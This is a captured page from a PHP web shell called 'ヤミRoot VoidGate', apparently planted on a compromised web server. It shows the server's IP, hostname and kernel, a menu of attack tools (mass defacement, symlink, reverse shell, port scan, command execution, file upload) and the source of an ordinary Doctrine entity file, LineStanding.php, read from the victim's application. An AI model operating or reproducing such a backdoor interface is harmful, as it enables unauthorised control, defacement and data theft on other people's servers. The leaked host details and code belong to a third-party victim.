ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Entity
/
Viewing: LineStanding.php
<?php namespace AppBundle\Entity; use Doctrine\ORM\Mapping as ORM; use JMS\Serializer\Annotation as Serializer; /** * LineStanding * * @ORM\Table(name="line_standing") * @ORM\Entity(repositoryClass="AppBundle\Repository\LineStandingRepository") */ class LineStanding { /** * @var int * * @ORM\Column(name="id", type="integer") * @ORM\Id * @ORM\GeneratedValue(strategy="AUTO") * @Serializer\Groups({"LIST", "LINE_STANDING_DETAILS"}) */ private $id; /** * @var \AppBundle\Entity\Line * * @ORM\ManyToOne(targetEntity="AppBundle\Entity\Line" ,inversedBy="lineStandings") * @ORM\JoinColumn(nullable=false) * * @Serializer\Groups({"LIST", "TRAVEL_CONFIG_DETAILS", "TRAVEL_DETAILS"}) * @Serializer\MaxDepth(1) */ private $line; /** * @var \AppBundle\Entity\Standing * * @ORM\ManyToOne(targetEntity="AppBundle\Entity\Standing") * @ORM\JoinColumn(nullable=false) * * @Serializer\Groups({"LIST", "LINE_DETAILS"}) * @Serializer\MaxDepth(2) */ private $standing; /** * @var int * * @ORM\Column(name="sit_cost", type="integer") * @Serializer\Groups({"LIST", "TRAVEL_DETAILS"}) */ private $sitCost; /** * Get id * * @return int */ public function getId() { return $this->id; } /** * Constructor */ public function __construct() { $this->standings = new \Doctrine\Common\Collections\ArrayCollection(); } /** * Set sitCost * * @param integer $sitCost * * @return LineStanding */ public function setSitCost($sitCost) { $this->sitCost = $sitCost; return $this; } /** * Get sitCost * * @return integer */ public function getSitCost() { return $this->sitCost; } /** * Set line * * @param \AppBundle\Entity\Line $line * * @return LineStanding */ public function setLine(\AppBundle\Entity\Line $line) { $this->line = $line; return $this; } /** * Get line * * @return \AppBundle\Entity\Line */ public function getLine() { return $this->line; } /** * Add standing * * @param \AppBundle\Entity\Standing $standing * * @return LineStanding */ public function addStanding(\AppBundle\Entity\Standing $standing) { $this->standings[] = $standing; return $this; } /** * Set standing * * @param \AppBundle\Entity\Standing $standing * * @return LineStanding */ public function setStanding(\AppBundle\Entity\Standing $standing) { $this->standing = $standing; return $this; } /** * Get standing * * @return \AppBundle\Entity\Standing */ public function getStanding() { return $this->standing; } }
Coded With 💗 by
0x6ick